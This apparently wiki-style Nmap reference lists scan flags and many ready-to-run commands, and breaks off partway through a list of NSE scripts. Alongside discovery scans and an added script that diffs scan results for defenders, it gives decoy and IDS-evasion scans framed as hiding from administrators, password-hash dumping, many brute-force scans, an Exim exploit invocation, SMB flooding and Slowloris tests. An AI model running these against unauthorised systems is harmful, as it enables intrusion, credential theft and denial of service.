Nmap is a great tool for discovering the network services and ports that your server is exposing to the network. This guide covers basic information, network scanning and advanced techniques for one of the most powerful and flexible network scanners available.
1 NMAP Flags
2 Common Nmap Uses
3 Scan Types
4 Scan by using NSE Scripts
5 NMAP Attack Examples
5.1 Privilege Escalation
5.2 NMAP the Target Network
5.3 Auditing Remote Desktop Passwords with NMAP and Ncrack
5.4 Hacking Windows 7 with NMAP and Metasploit

Note:

  • sudo nmap -T4 -A -sV -p 1-65535 <Target IP>
  • sudo nmap -T4 -A -v -p 1-65535 <Target IP> Ref: SEC-2259
  • sudo nmap -n -vv -A <Target IP> --min-parallelism=50 --max-parallelism=150 -PN -T2 -oA <Target IP> Ref: SEC-2264

1 NMAP Flags

-sL List Scan (List Targets to Scan)
-sn Ping Scan (Disable Port Scan)
-sS SYN Scan
-sT TCP Connect Scan
-sP Ping Scan
-sU UDP Scan
-sO IP Protocol Scan
-b FTP Bounce Scan
-sN TCP Null Scan
-sF FIN Scan
-sX XMAS Scan
-sA ACK Scan
-sW TCP Window Scan
-sR RPC Scan
-sI <zombie host[:probeport]>: Idle scan
-sY SCTP INIT Scan
-sZ SCTP COOKIE ECHO Scan
-sV Probe Open Ports to Identify Service Version Info Scan
-sC Script Scan (Run the Default NSE Script Set)
-A Enable OS Detection, Version Detection, Script Scanning, and TraceRoute

-Pn Treat All Hosts as OnLine (Skip Host Discovery)
-PN Older Spelling of -Pn (Skip Host Discovery; No ICMP Echo Probe is Sent)
-PS / PA / PU / PY[portlist] TCP SYN/ACK, UDP or SCTP Discovery to Specified Ports
-PE / PP / PM ICMP Echo, Timestamp, and Netmask Request Discovery Probes
-n / -R Never do DNS Resolution / Always Resolve [Default: Sometimes]
--dns-servers <serv1[,serv2],...> Specify Custom DNS Servers
--system-dns Use OS's DNS Resolver
--traceroute Trace Hop Path to Each Host

-F Fast Mode
-p <Port-Range>
-O OS Detection
-T<0-5> Timing Template (Higher is Faster)

FIREWALL/IDS EVASION and SPOOFING:
-f; --mtu <val> Fragment Packets (Optionally with specified MTU)
-D <decoy1,decoy2[,ME],...> Cloak a Scan with Decoys
-S <IP_Address> Spoof Source Address
-e <iface> Use Specified Network Interface
-g <portnum> Use specified Port Number
--data-length <num> Append Random Data to Sent Packets
--ip-options <options> Send Packets with Specified IP Options
--ttl <val> Set IP Time-To-Live Field
--spoof-mac <MAC Address/Prefix/Vendor Name> Spoof your MAC address
--badsum Send Packets with a Bogus TCP/UDP/SCTP Checksum

OUTPUT:
-oN/-oX/-oS/-oG <file> Output Scan in Normal, XML, s|<rIpt kIddi3, and Grepable Format, respectively, to the Specified FileName.
-oA <basename> Output in the three major formats at once
-v Increase Verbosity Level (-vv or More for a Greater Verbosity)
-d Increase Debugging Level (-dd or More for a Greater Verbosity)
--reason Display the Reason a Port is in a Particular State
--open Only Show Open (or Possibly Open) Ports
--packet-trace Show All Packets Sent and Received
--iflist Print Host Interfaces and Routes (for Debugging)
--log-errors Log Errors/Warnings to the Normal-Format Output File
--append-output Append to Rather than Clobber Specified Output Files
--resume <filename> Resume an Aborted Scan

-iL <Input FileName> Input Targets from a List of Hosts in the Specified File
-iR <Num Hosts> Choose Random Targets
--exclude <host1[,host2][,host3],...> Exclude Hosts / Networks
--excludefile <exclude_file> Exclude List of Hosts / Networks from File

2 Common Nmap Uses

Full Scan:
nmap -p1-5000 -T4 -sS 92.246.34.60

Use a Decoy when Scanning Ports to Avoid getting Caught by the SysAdmin.
This will show the Decoy IP Address Instead of Your IP in the Target's Security Logs. The Decoy IP Address Needs to be Alive.
Check the Target's Security Log (/var/log/secure) to make Sure it Worked.
nmap -sS 192.168.0.10 -D 192.168.0.2

Scan the Same Network for All the Services in /etc/services (All of the Reserved Ports) via Very Fast TCP Scan:
nmap -F warez.com/24

Port Scan:
nmap target
nmap -v -sT 192.168.0.0/24
ncat -v -l -p 111
for i in {21..29}; do nc -v -n -z -w 1 192.168.0.$i 443; done

Ping Scan (or Ping Sweep) of a Subnet:
nmap -sP 10.50.100.1-255
for i in {1..254}; do ping -c 1 -W 1 10.1.1.$i | grep 'from'; done

Get List of Servers with a Specific Port Open through a TCP Connect Scan (is Slower and has More Overhead than a SYN Scan):
nmap -sT -p 80 -oG - 192.168.1.* | grep open
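
Grepping Nmap's normal output breaks as soon as the layout changes; the grepable (-oG) format above is meant to be parsed. The following POSIX shell example is added here and is not from the original page: it parses two constructed -oG captures (the sample scan text is made up) into host/port lines and lists the ports open in the current scan that were not open in the baseline, which is how a defender turns these scans into an exposure check.

```shell
#!/bin/sh
# Added example, not from the original page. Parses Nmap grepable (-oG) output
# and diffs two scans so newly exposed ports stand out. Both captures below are
# constructed sample data, not real scan results.

# Grepable format: tab-separated fields; the "Ports:" field holds comma-separated
# entries of the form port/state/proto/owner/service/rpc/version/
BASELINE_GNMAP=$(printf '%b\n' \
  '# Nmap 7.94 scan initiated as: nmap -sS -p 1-10000 -oG - 192.168.1.0/28' \
  'Host: 192.168.1.1 ()\tStatus: Up' \
  'Host: 192.168.1.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: filtered (9997)' \
  'Host: 192.168.1.5 ()\tPorts: 22/open/tcp//ssh///\tIgnored State: closed (9999)' \
  '# Nmap done -- 16 IP addresses (2 hosts up) scanned in 5.12 seconds')

CURRENT_GNMAP=$(printf '%b\n' \
  '# Nmap 7.94 scan initiated as: nmap -sS -p 1-10000 -oG - 192.168.1.0/28' \
  'Host: 192.168.1.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 8080/open/tcp//http-proxy///\tIgnored State: filtered (9997)' \
  'Host: 192.168.1.5 ()\tPorts: 22/open/tcp//ssh///, 3306/filtered/tcp//mysql///\tIgnored State: closed (9998)' \
  'Host: 192.168.1.9 ()\tPorts: 22/open/tcp//ssh///\tIgnored State: closed (9999)' \
  '# Nmap done -- 16 IP addresses (3 hosts up) scanned in 6.40 seconds')

# open_ports: read -oG text on stdin, print "host port/proto service" for every
# port whose state is exactly "open" (filtered/closed are skipped), sorted so
# that two listings can be diffed line by line.
open_ports() {
  awk -F'\t' '
    /^Host: / {
      host = $1
      sub(/^Host: /, "", host); sub(/ .*/, "", host)   # keep the bare IP
      for (i = 2; i <= NF; i++) {
        if ($i !~ /^Ports: /) continue
        list = $i; sub(/^Ports: /, "", list)
        n = split(list, entry, ", ")
        for (j = 1; j <= n; j++) {
          split(entry[j], f, "/")   # f[1]=port f[2]=state f[3]=proto f[5]=service
          if (f[2] == "open") printf "%s %s/%s %s\n", host, f[1], f[3], f[5]
        }
      }
    }' | LC_ALL=C sort
}

# new_exposures: lines present in the current listing ($2) but absent from the
# baseline listing ($1); both are files produced by open_ports.
new_exposures() {
  awk 'NR == FNR { seen[$0] = 1; next } !($0 in seen)' "$1" "$2"
}

# report: compare the two embedded captures, print every newly open port and
# return 1 when at least one exists, so the function can gate a cron job.
report() {
  base=$(mktemp) && cur=$(mktemp) || return 2
  printf '%s\n' "$BASELINE_GNMAP" | open_ports > "$base"
  printf '%s\n' "$CURRENT_GNMAP"  | open_ports > "$cur"
  new_exposures "$base" "$cur"
  count=$(new_exposures "$base" "$cur" | wc -l | tr -d ' ')
  rm -f "$base" "$cur"
  [ "$count" -eq 0 ]
}
```

Run the same two scans with -oG against your own ranges, store the baseline listing, and the diff becomes a change report rather than a one-off port list.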

List of reverse DNS records for a subnet:
nmap -R -sL 209.85.229.99/27 | awk '{if($3=="not")print"("$2") no PTR";else print$3" is "$2}' | grep '('

Find Duplicate Addresses in a Subnet (arping -D exits non-zero when another host answers for the address):
for i in $(seq 1 254); do arping -q -D -I eth0 -c 2 192.168.1.${i}; [ $? -ne 0 ] && echo "192.168.1.${i} duplicate"; done

Find All of the Active IP Addresses in a Subnet (by using Ping Scan):
nmap -sP 192.168.0.*
nmap -sP -R 192.168.1.0/24 |grep up
nmap -sP -PR 192.168.0.*
nmap -sP 10.1.1.0/24 > lanscan.txt
nmap -sP 192.168.1.0/24; arp -n | grep "192.168.1.[0-9]* *ether"
ping -c2 192.168.1.255 >/dev/null; arp -a
arp-scan -l
arp-scan -I eth0 192.168.1.0/24

nmap -v -sP 192.168.0.0/16 10.0.0.0/8

for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip >/dev/null; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
for ip in $(seq 1 254); do nslookup 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done

OR on Windows:
for /L %i in (1,1,254) do ping -n 1 10.254.254.%i | find /i "Reply" >> c:\ipaddresses.txt

OR Faster:
nmap -sP 192.168.0.0/24 | grep -oE '([[:digit:]]{1,3}\.){3}[[:digit:]]{1,3}'

Find All of the Active Hosts in the Adjacent Class C's 193.14.12, .13, .14, .15, ..., .30:
nmap -sP '193.14.12-30.*'

OR, If you don't want to have to quote it to avoid shell interpretation:
nmap -sP 193.14.12-30.0-255

Find All Unused IP Addresses in a Subnet:
nmap -sP -R 192.168.1.0/24 |grep down

OR:
nmap -T4 -sP 192.168.2.0/24 && egrep "00:00:00:00:00:00" /proc/net/arp

OR:
fping -g 192.168.0.2 192.168.0.254 2>/dev/null
fping -g 192.168.0.2 192.168.0.254 2>/dev/null | grep 'is unreachable' | cut -d ' ' -f 1 | sort -t '.' -k 4 -n

How Many Linux And Windows Devices Are On Your Network?
nmap -F -O 192.168.0.1-255 | grep "Running: " > /tmp/os; echo "$(grep -c Linux /tmp/os) Linux device(s)"; echo "$(grep -c Windows /tmp/os) Windows device(s)"

OS Detection Scan:
With so many different operating systems and versions around, it is really interesting how Nmap detects the operating system of a target in a very short time. Let us study the OS detection command in detail.

Table 1: Analysing the output of an OS detection scan (each output line is followed by its interpretation, indented)

nmap -O -v -oN versiondetect.txt 192.168.2.101
  Syntax of the executed command. -v increases the verbosity of the output.
Initiating OS detection (try #1) against 192.168.2.101
  OS detection uses a combination of ICMP echo, TCP and UDP packets.
Host 192.168.2.101 is up (0.0030s latency).
  Discovered the host status in practically no time.
Interesting ports on 192.168.2.101:
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
  Lists the detected open ports on the host.
MAC Address: 00:16:76:CE:8C:3C (Intel)
  MAC address of the host's Ethernet card, and its manufacturer.
Device type: general purpose
Running: Microsoft Windows XP
  With at least one open and one closed port on the target host, Nmap can detect the target OS effectively. To instruct Nmap to detect the OS only on such hosts, to save scan time, use the --osscan-limit option.
OS details: Microsoft Windows XP SP2 or SP3 or Windows server 2003
Network Distance: 1 hop
  The host is in the same network.
TCP Sequence Prediction: Difficulty=264 (Good luck!)
  The TCP 3-way handshake is initiated by a SYN packet carrying an initial sequence number. If this number can be predicted, an attacker can construct a spoofed packet which will appear to have been sent by the scanned host. This value denotes the difficulty of predicting the initial sequence number.
IP ID Sequence Generation: Incremental
Read data files from: /usr/share/nmap
OS detection performed. Please report any incorrect results at http://nmap.org/submit/.
  Gives the user a chance to submit incorrect OS detection data to the Nmap team, for improvements in the next version.
# Nmap done at Tue Nov 30 20:13:03 2010 -- 1 IP address (1 host up) scanned in 3.56 seconds
  Completed the whole OS detection for one host in less than 4 seconds!

Security by obscurity? Assuming you are a Web developer, would you be interested in running an httpd service on a non-standard TCP port, say 1793, rather than on the standard TCP port 80? In the early days, before I knew enough about the various Nmap scan techniques, I thought this was just incredible! I felt I'd found a gold mine: if a service is running on a non-standard port, that alone seemed to add a great layer of security.

Welcome to the world of Nmap, which detects practically any service, even one running on a non-standard port.
Table 2 shows Nmap scan output against a live IPCop firewall with its Web interface configured on TCP port 1775. By default, IPCop runs the SSH service on the non-standard TCP port 222 (as against the standard SSH port 22). The output is filtered.

OS Detection and Ports Probe Scan against an IPCop Firewall on Ports 222 and 1775 (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -v -O -PN -p 222,1775 -sV -oN IPCopOS.txt 121.xxx.xxx.xxx

Find Rogue AP on a Subnet:
nmap -A -p1-85,113,443,8080-8100 -T4 --min-hostgroup 50 --max-rtt-timeout 2000ms --initial-rtt-timeout 300ms --max-retries 3 --host-timeout 20m --max-scan-delay 1000ms -oA wapscan 10.0.0.0/8

Find the Conficker Virus on a Subnet (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 192.168.0.1-254

SNMP Win32 Users Scan:
nmap -sV -sC 192.168.101.0/24

Scan 4096 IP Addresses for Any Web Servers (without pinging them) and Save Output in grepable and XML formats (using the -Pn Option to Skip Pinging the Targets):
nmap -Pn -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20

Scan the Specified Subnet for NetBIOS Information:
nbtscan -v -m 2 192.168.1.1/24

Get Current Host Public IP:
alias myip='curl -s http://checkrealip.com/ | grep "Current IP Address"'

Complete a TCP Handshake on a Specified Host and Port:
nc -zvw 1 host port

IDS Evasion Attack:
nmap -sS -PN -p80,443 -T1 131.107.1.254

Confuse an IDS / IPS by Sending Requests with Decoys or a Different IP Address:
nmap -sS -D234.34.34.45,ME,234.23.34.23 -p 80 www.xyz.com

Get SMB Server Time:
nmap --script=smb-os-discovery.nse xxx.xxx.xxx.xxx/24 -p 139,445 | grep "System time" | sort -r

3 Scan Types

Stealth Scan of the Entire Class "B" Networks 166.66.0.0 and 166.67.0.0 for the IMAPd Daemon:
nmap -sS -p 143 166.66.0.0/16 166.67.0.0/16

Stealth SYN Scan with OS Detection on the Specified Network:
nmap -sS -O scanme.nmap.org/24

ACK Scan for Open TCP Ports (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -sA -vv -n -p1-1000 -T4 -oN NmapACKScan.txt 117.X.X.X

TCP Connect Scan for Open TCP Ports (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -sT -vv -n -p1-1000 -T4 -oN NmapTCPConnect.txt 117.X.X.X

Version Detection Scan and Host Enumeration on the Specified Ports and IP Address Range:
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127

SYN Scan to Get Info about Remote Host Ports and OS Detection:
nmap -sS -P0 -sV -O <target>

Fragmented SYN Scan for Open TCP Ports (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -sS -f -vv -n -p1-1000 -T4 --max-rtt-timeout 15 -oN NmapSYNScan.txt 117.X.X.X

Fragmented SYN Scan of the Class "C" Network on which warez.com Sits for Popular Services:
nmap -f -sS -p 21,22,23,25,80,110 warez.com/24

XMAS Tree Scan on the Specified Subnet:
nmap -v -sX 192.168.0.0/24

FIN Scan on the Specified Subnet:
nmap -v -sF 192.168.0.0/24

TCP Null Scan on the Specified Subnet:
nmap -v -sN 192.168.0.0/24

TCP Window Scan on the Specified Subnet:
nmap -v -sW 192.168.0.0/24

TCP RPC Scan on the Specified Subnet:
nmap -v -sR 192.168.0.0/24

FTP Bounce Attack Scan (Scan secret.pathetic.net using the FTP Bounce Attack Off of ftp.pathetic.net):
nmap -b ftp.pathetic.net secret.pathetic.net

UDP Scan and TCP Connect Scan for Open Ports (Firewall Scan from Inside the Network):
nmap -vv -sU -sT -p1-1000 -n -r -T4 -oN NmapIPCopInternal.txt 192.168.1.1

Idle Scan against the RIAA by providing a Zombie (kiosk.adobe.com):
nmap -P0 -p- -sI kiosk.adobe.com www.riaa.com

Stealth Idle Scan with Packet Trace:
nmap -sI Zombie -Pn -p20-25,110 -r --packet-trace -v Target

4 Scan by using NSE Scripts

The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It allows users to write and share scripts to automate a wide variety of networking tasks.
These scripts are written in the embedded Lua programming language and are executed in parallel.
Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet custom needs.
The official Nmap NSE Scripts and Lua Libraries portal lets you browse and download the scripts by category or alphabetically by name.

Below are many useful examples of running Nmap scans using NSE scripts.

Sniffer Detection on the Specified File Containing a List of IP Addresses:
nmap --script sniffer-detect -iL IPList.txt -oN sniffer-detect.txt

Perform Firewalking (Discover Firewall Rules using an IP TTL Expiration Technique):
nmap --script=firewalk --traceroute <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1 <host>
nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-probed-ports=7 <host>

Detect a Vulnerability in Netfilter and other Firewalls that use Helpers to Dynamically Open Ports for Protocols such as FTP and SIP:
nmap --script firewall-bypass <target>
nmap --script firewall-bypass --script-args firewall-bypass.helper="ftp",firewall-bypass.targetport=22 <target>

Perform a DNS Fuzzing Attack against a DNS Server:
nmap --script dns-fuzz --script-args timelimit=2h 192.168.101.9

Perform Form Fuzzing against Forms on Web Sites:
nmap --script http-form-fuzzer -p 80 192.168.101.9

Crawl a Web Server and Send an Attack Vector/Probe to Find PHP Files Vulnerable to Reflected Cross-Site Scripting via the Variable $_SERVER["PHP_SELF"].
PHP_SELF XSS Refers to Vulnerabilities caused by the Lack of Sanitization of the Variable $_SERVER["PHP_SELF"], commonly used in PHP Scripts that display Forms.
The Vector/Probe used is /'"/><script>alert(1)</script>
nmap --script=http-phpself-xss -p80 <target>
nmap -sV --script http-phpself-xss <target>

Checks if a VNC Server is Vulnerable to the RealVNC Authentication Bypass (CVE-2006-2369):
nmap -sV --script realvnc-auth-bypass.nse 192.168.101.3
nmap -sV -sC --script realvnc-auth-bypass 192.168.101.3

Oracle 11g Users Scan (bug fixed in Oracle's October 2009 Critical Patch Update):
nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 192.168.101.25

Dumps the Password Hashes from a MySQL Server in a Format Suitable for Cracking by Tools such as John the Ripper:
nmap -p 3306 192.168.101.9 --script mysql-dump-hashes --script-args='username=root,password=secret'

MySQL Server Users Scan:
nmap -sV --script mysql-users 192.168.101.9

Brute Force MySQL Passwords:
nmap --script=mysql-brute 192.168.101.9

Run a Query against a MySQL Database and Return the Results as a Table (username and password are optional; single quotes inside the single-quoted argument are written as '\''):
nmap -p 3306 192.168.101.9 --script mysql-query --script-args='query="SELECT * FROM table_name WHERE (userID LIKE '\''%ELM%'\'');",username=root,password=secret'
nmap -p 3306 192.168.101.9 --script mysql-query --script-args='query="GRANT ALL PRIVILEGES ON db_base.* TO '\''db_user'\''@'\''%'\'' IDENTIFIED BY '\''db_passwd'\'';",username=root,password=secret'
nmap -p 3306 192.168.101.9 --script mysql-query --script-args='query="UPDATE table_name SET status='\''OK'\'', permissions='\''ALL'\'' WHERE (userID LIKE '\''%ELM%'\'');",username=root,password=secret'

Dumps the Password Hashes from a Microsoft SQL Server (ms-sql) in a Format Suitable for Cracking by Tools such as John the Ripper:
nmap -p 1433 192.168.101.5 --script ms-sql-dump-hashes

Attempts to Authenticate to Microsoft SQL Servers using an Empty Password for the Sysadmin (sa) Account:
nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-all 192.168.101.5
nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-name=PRDB,mssql.instance-port=1432 192.168.101.5
nmap -p 1433 --script ms-sql-empty-password 192.168.101.5

Queries Microsoft SQL Server (ms-sql) Instances for a List of Databases a User has Access to:
nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa 192.168.101.5
nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa,mssql.instance-all 192.168.101.5
nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa,mssql.instance-name=PRDB,mssql.instance-port=1432 192.168.101.5

Retrieves the Authentication Scheme and Realm of a Web Service that Requires Authentication (the http-auth.path argument is optional):
nmap --script http-auth -p80 192.168.101.45
nmap --script http-auth --script-args http-auth.path=/login -p80 192.168.101.45

Scan for Access with Default Credentials used by a variety of Web Applications and Devices:
nmap -p80 --script http-default-accounts 192.168.101.45

Scan whether a JBoss Server is Vulnerable to JMX Console Authentication Bypass (CVE-2010-0738):
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' 192.168.101.45

Discovers Valid Usernames by Brute-Force Querying Likely Usernames against a Kerberos Service:
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' <target>

Checks Target IP Addresses against Multiple DNS Anti-Spam and Open Proxy Blacklists and Returns a List of Services for which an IP has been Flagged.
Checks may be Limited by Service Category (eg: SPAM, PROXY) or to a Specific Service Name.
nmap --script dns-blacklist --script-args='dns-blacklist.ip=192.168.101.45'
nmap -sn 192.168.101.45 --script dns-blacklist

Detects whether the Remote Device has IP Forwarding or "Internet Connection Sharing" Enabled, by Sending an ICMP Echo Request to a Given Target using the Scanned Host as Default Gateway:
nmap -sn 192.168.101.145 --script ip-forwarding --script-args='target=www.example.com'

Extracts a List of Citrix Servers from the ICA Browser Service:
nmap -sU --script=citrix-enum-servers -p 1604 <target>

Extracts a List of Applications, ACLs, and Settings from the Citrix XML Service:
nmap --script=citrix-enum-apps-xml -p 80,443,8080 192.168.101.45

Check if the ePO Agent is Running on Port 8081 or on a Port Identified as the ePO Agent Port:
nmap -sV --script=mcafee-epo-agent 192.168.101.45

Check for the Presence of the MS12-020 RDP Vulnerability:
nmap -sC -p 3389 -vv --script-trace --script ms12-020-rev.nse 192.168.10.10

Attempts to Perform an LDAP Search and Returns All Matches:
nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=users,ldap.attrib=sAMAccountName' 192.168.101.45

nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=custom,ldap.searchattrib="operatingSystem",ldap.searchvalue="Windows *Server*",ldap.attrib={operatingSystem,whencreated,OperatingSystemServicePack}' 192.168.101.45

Retrieves the LDAP Root DSA-Specific Entry (DSE):
nmap -p 389 --script ldap-rootdse 192.168.101.45

Lists Remote File Systems by Querying the Remote Device using the Network Data Management Protocol (NDMP).
NDMP is a Protocol Intended to Transport Data Between a NAS Device and the Backup Device, Removing the Need for the Data to Pass through the Backup Server.
nmap -p 10000 --script ndmp-fs-info <target>

Retrieves Configuration Information from a Lexmark S300-S400:
nmap -sV --script=lexmark-config 192.168.101.45

Lotus Domino Users Scan:
nmap --script domino-enum-users -p 1352 192.168.101.145

Scan for an identd (auth) Server which is Spoofing its Replies:
nmap -sV --script=auth-spoof 192.168.101.145

Looks for Signatures of Known Server Compromises (see
http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/):
nmap -sV --script=http-malware-host 192.168.101.145

Checks if Hosts are on Google's Blacklist of Suspected Malware and Phishing Servers.
The script queries Google's Safe Browsing service; you need your own API key to access the Google Safe Browsing Lookup service.
Sign up for yours at http://code.google.com/apis/safebrowsing/key_signup.html.
nmap -p80 --script http-google-malware 192.168.101.145

Scan for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523):
nmap --script ftp-vsftpd-backdoor -p 21 192.168.101.145

Scan for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562:
nmap --script ftp-proftpd-backdoor -p 21 192.168.101.145

Brute Force Password Scan against the WinPcap Remote Capture Daemon (rpcap):
nmap -p 2002 192.168.101.145 --script rpcap-brute

Brute Force Password Scan against rsync:
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.101.145

Brute Force Password Scan against the VMware Authentication Daemon (vmware-authd):
nmap -p 902 192.168.101.145 --script vmauthd-brute

Brute Force Password Scan against VNC Servers:
nmap --script vnc-brute -p 5900 192.168.101.145

Brute Force Password Scan against SMTP using LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM:
nmap -p 25 --script smtp-brute 192.168.101.145

Brute Force Password Scan against the rlogin Service:
nmap -p 513 --script rlogin-brute 192.168.101.145

Brute Force Password Scan against POP3 Servers using either "USER" (default), "SASL-PLAIN", "SASL-LOGIN", "SASL-CRAM-MD5", or "APOP":
nmap -sV --script=pop3-brute 192.168.101.145

Brute Force Password Scan against IMAP Servers using either LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM Authentication:
nmap -p 143,993 --script imap-brute 192.168.101.145

Scan for and/or Exploit a Heap Overflow within Versions of Exim prior to 4.69 (CVE-2010-4344) and a Privilege Escalation Vulnerability in Exim 4.72 and below (CVE-2010-4345).
The heap overflow vulnerability allows remote attackers to execute arbitrary code with the privileges of the Exim daemon (CVE-2010-4344). If the exploit fails, the Exim smtpd child will be killed (heap corruption).
The privilege escalation vulnerability allows the exim user to gain root privileges by specifying an alternate configuration file using the -C option (CVE-2010-4345).
nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 192.168.101.145
nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587 192.168.101.145

Detects PHP-CGI Installations Vulnerable to CVE-2012-1823, a Critical Vulnerability that Allows Attackers to Retrieve Source Code and Execute Code Remotely.
The script works by appending "?-s" to the URI to make vulnerable php-cgi handlers return colour syntax-highlighted source. It uses the pattern "<span style=.*>&lt;?" to detect vulnerable installations.
nmap -sV --script http-vuln-cve2012-1823 192.168.101.145
nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php 192.168.101.145

Scan a Web Server for Slowloris DoS Attack Vulnerability:
nmap --script http-slowloris --max-parallelism 400 192.168.101.145

Exhausts a Remote SMB Server's Connection Limit by Opening as Many Connections as it can.
Most implementations of SMB have a Hard Global Limit of 11 Connections for User Accounts and 10 Connections for Anonymous.
Once that Limit is Reached, further Connections are Denied. This Script Exploits that Limit by taking up All the Connections and Holding them.
This works better with a valid user account, because Windows reserves one slot for valid users.
nmap --script smb-flood.nse -p445 192.168.101.145
nmap -sU -sS --script smb-flood.nse -p U:137,T:139 192.168.101.145

Detects Huawei Modem Models HG530x, HG520x, HG510x (and others) Vulnerable to a Remote Credential and Information Disclosure Vulnerability. It also Extracts the PPPoE Credentials and Other Interesting Configuration Values.
nmap -p80 --script http-huawei-hg5xx-vuln <target>
nmap -sV --script http-huawei-hg5xx-vuln <target>

Scan to Discover Hosts in the Local Network using the DNS Service Discovery Protocol and Send a NULL UDP Packet to Each Host to Test if it's Vulnerable to the Avahi NULL UDP Packet Denial of Service (CVE-2011-1002):
nmap --script=broadcast-avahi-dos

Exploits the CVE-2012-3137 Vulnerability, a Weakness in Oracle's O5LOGIN Authentication Scheme:
nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL 192.168.101.145

Guesses Oracle Instance/SID Names against the TNS Listener:
nmap --script=oracle-sid-brute --script-args=oraclesids=/path/to/sidfile -p 1521-1560 192.168.101.145
nmap --script=oracle-sid-brute -p 1521-1560 192.168.101.145

Brute Force Password Scan against the Nessus Vulnerability Scanning Daemon using the NTP 1.2 Protocol:
nmap --script nessus-brute -p 1241 192.168.101.145

acarsd Scan on the Specified Port and Host/Network:
nmap --script acarsd-info --script-args "acarsd-info.timeout=10,acarsd-info.bytes=512" -p <port> 192.168.101.145

Brute Force Password Scan against an FTP Server:
nmap --script ftp-brute -p 21 192.168.101.145

Scan an FTP Server for Anonymous Login:
nmap -sV --script ftp-anon 192.168.101.145

Spiders a Web Site and Collects E-mail Addresses:
nmap --script=http-email-harvest 192.168.101.145

Checks for a Path-Traversal Vulnerability in VMware ESX, ESXi, and Server (CVE-2009-3733):
nmap --script http-vmware-path-vuln -p80,443,8222,8333 192.168.101.145

Retrieves Information from an Apache Hadoop Secondary NameNode HTTP Status Page:
nmap --script hadoop-secondary-namenode-info -p 50090 192.168.101.145

Retrieves Information from an Apache Hadoop NameNode HTTP Status Page:
nmap --script hadoop-namenode-info -p 50070 192.168.101.145

Discovers Hostnames that Resolve to the Target's IP Address by Querying the Robtex Service at http://www.robtex.com/dns/:
nmap --script hostmap-robtex <target>

Retrieves the Locations of All "Find my iPhone" Enabled iOS Devices by Querying the MobileMe Web Service:
nmap -sn -Pn --script http-icloud-findmyiphone --script-args='username=<user>,password=<pass>'

Brute Force Password Scan against an HTTP Server (Basic Authentication; Default Method GET):
nmap --script http-brute -p 80 192.168.101.145

Brute Force Password Scan against an HTTP Server (Form-Based Authentication):
nmap --script http-form-brute -p 80 192.168.101.145

Brute Force Password Auditing against Joomla Web CMS Installations:
nmap -sV --script http-joomla-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-joomla-brute.hostname=domain.com,http-joomla-brute.threads=3,brute.firstonly=true' 192.168.101.145
nmap -sV --script http-joomla-brute 192.168.101.145

Brute Force Password Scan against an HTTP Proxy Server:
nmap --script http-proxy-brute -p 8080 192.168.101.145

Brute Force Password Auditing against the BackOrifice Service:
nmap -sU --script backorifice-brute 192.168.101.115 --script-args backorifice-brute.ports="U:31337,25252,151-222"

Brute Force LDAP Authentication:
nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' <host>

Brute Force Password against an iSCSI Target:
nmap -sV --script=iscsi-brute 192.168.101.115

Brute Force Password against a WordPress CMS/Blog Server:
nmap -sV --script http-wordpress-brute 192.168.101.115
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.101.115

Attempts to Guess Valid Credentials for the Citrix PN Web Agent XML Service:
